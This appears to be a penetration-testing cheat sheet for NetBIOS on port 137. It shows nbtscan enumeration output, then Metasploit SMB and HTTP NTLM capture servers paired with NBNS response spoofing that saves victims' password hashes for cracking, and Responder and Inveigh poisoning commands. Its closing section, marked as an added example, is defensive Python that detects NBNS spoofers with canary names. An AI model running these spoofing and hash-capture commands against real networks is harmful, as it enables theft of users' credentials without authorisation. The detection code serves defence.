137 - Netbios

Broadcast discovery

nbtscan 172.18.2.0/24
	
172.18.2.9:GCDTA0000:00U
172.18.2.9:WORKGROUP:00G
172.18.2.9:GCDTA0000:20U
172.18.2.9:MAC:00-23-7d-aa-72-c2

nbtscan (unixwiz.net version):

Download:

wget http://www.unixwiz.net/tools/nbtscan-1.0.35-redhat-linux
root@Kali:~/Downloads# ./nbtscan-1.0.35-redhat-linux -A 192.168.0.15 
192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING 
  DOOKOSSEL      <00> UNIQUE Workstation Service 
  DOOKOSSEL      <03> UNIQUE Messenger Service<3> 
  DOOKOSSEL      <20> UNIQUE File Server Service 
  ..__MSBROWSE__.<01> GROUP  Master Browser 
  WORKGROUP      <00> GROUP  Domain Name 
  WORKGROUP      <1d> UNIQUE Master Browser 
  WORKGROUP      <1e> GROUP  Browser Service Elections 
  00:00:00:00:00:00   ETHER

Windows NBTSCAN

Netbios Spoofing

Metasploit

use auxiliary/server/capture/smb
set CAINPWFILE /netbios/cain.
set JOHNPWFILE /netbios/john. 

set LOGFILE /netbios/SMB_LOG.txt
set SRVHOST 10.222.101.213
run
	
use auxiliary/server/capture/http_ntlm
set CAINPWFILE /netbios/cain-http
set JOHNPWFILE /netbios/john-http
set SRVHOST 10.222.101.213
set SRVPORT 80
set URIPATH /
run
	
use auxiliary/spoof/nbns/nbns_response
set INTERFACE eth0
set SPOOFIP 10.222.101.213
run

Capture Netbios broadcasts

Responder

sudo python3.9 /usr/share/responder/Responder.py -I eth0 -w -f -v

Inveigh - (PowerShell Responder)

Requires a privileged user.

https://n0where.net/windows-powershell-llmnrnbns-spoofer-inveigh
https://github.com/Kevin-Robertson/Inveigh

cd C:\Users\Leon\powermenu\Inveigh\Inveigh-master
Import-Module .\Inveigh.psm1

To execute with default settings

Invoke-Inveigh

To execute with features enabled/disabled

Invoke-Inveigh -LLMNR Y -NBNS Y -HTTP Y -HTTPS Y -SMB Y -ConsoleOutput Y -IP <yourIP>

You must stop Inveigh manually

Stop-Inveigh

Preventing Netbios attacks
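
The spoofers above (nbns_response, Responder, Inveigh) answer broadcast name queries for names they do not own, and that behaviour is visible on the wire. As an added example (not part of the original page or of any tool named here), this Python parses NBNS positive name query responses using the RFC 1002 layout and flags a source that answers for a canary name or for many distinct names. The canary name NBNS-CANARY-01, the address 172.18.2.66, the threshold and all function names are assumptions, and the packets are constructed samples.

```python
import struct
from collections import defaultdict

def encode_nb_name(name, suffix=0x00):
    """RFC 1001 first-level encoding: 16 bytes become 32 chars 'A'..'P'."""
    raw = name.upper().ljust(15).encode("ascii")[:15] + bytes([suffix])
    return bytes(x for b in raw for x in (0x41 + (b >> 4), 0x41 + (b & 0xF)))

def parse_nbns_response(payload):
    """Return (name, suffix, claimed_ip) for a positive name query response, else None."""
    if len(payload) < 62 or payload[12] != 0x20 or payload[45] != 0x00:
        return None
    _txid, flags, _qd, ancount = struct.unpack("!HHHH", payload[:8])
    rrtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", payload[46:56])
    enc = payload[13:45]
    # Require: R bit set, opcode 0, rcode 0, an NB (0x0020) answer, chars 'A'..'P'
    if (not flags & 0x8000 or flags & 0x780F or ancount < 1 or rrtype != 0x0020
            or rdlen < 6 or any(not 0x41 <= c <= 0x50 for c in enc)):
        return None
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    ip = ".".join(str(b) for b in payload[58:62])
    return raw[:15].decode("ascii", "replace").rstrip(), raw[15], ip

def find_spoofers(events, canaries, max_names=3):
    """events: (source_ip, udp_payload) pairs captured on UDP/137."""
    names = defaultdict(set)
    for src, payload in events:
        if parsed := parse_nbns_response(payload):
            names[src].add(parsed[0])
    alerts = {}
    for src, seen in names.items():
        hit = sorted(seen & set(canaries))
        if hit:                          # no real host owns a canary name
            alerts[src] = "answered canary name " + ", ".join(hit)
        elif len(seen) > max_names:      # threshold is an assumption; tune it
            alerts[src] = f"answered for {len(seen)} distinct names"
    return alerts

def build_response(name, ip):
    """Constructed sample packet, only used to exercise the detector offline."""
    hdr = struct.pack("!HHHHHH", 0x1337, 0x8500, 0, 1, 0, 0)
    rr = b"\x20" + encode_nb_name(name) + b"\x00" + struct.pack("!HHIH", 0x20, 1, 165, 6)
    return hdr + rr + b"\x00\x00" + bytes(int(o) for o in ip.split("."))

# Constructed traffic: one ordinary host, one host answering for every name asked.
SAMPLE = [("172.18.2.9", build_response("GCDTA0000", "172.18.2.9"))] + [
    ("172.18.2.66", build_response(n, "172.18.2.66"))
    for n in ("WPAD", "FILESRV01", "NBNS-CANARY-01", "PRINTSRV")]
print(find_spoofers(SAMPLE, {"NBNS-CANARY-01"}))
```

To use the canary check on a live network, a monitoring host has to periodically query the canary name itself; legitimate WINS servers should be excluded from the distinct-name threshold.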
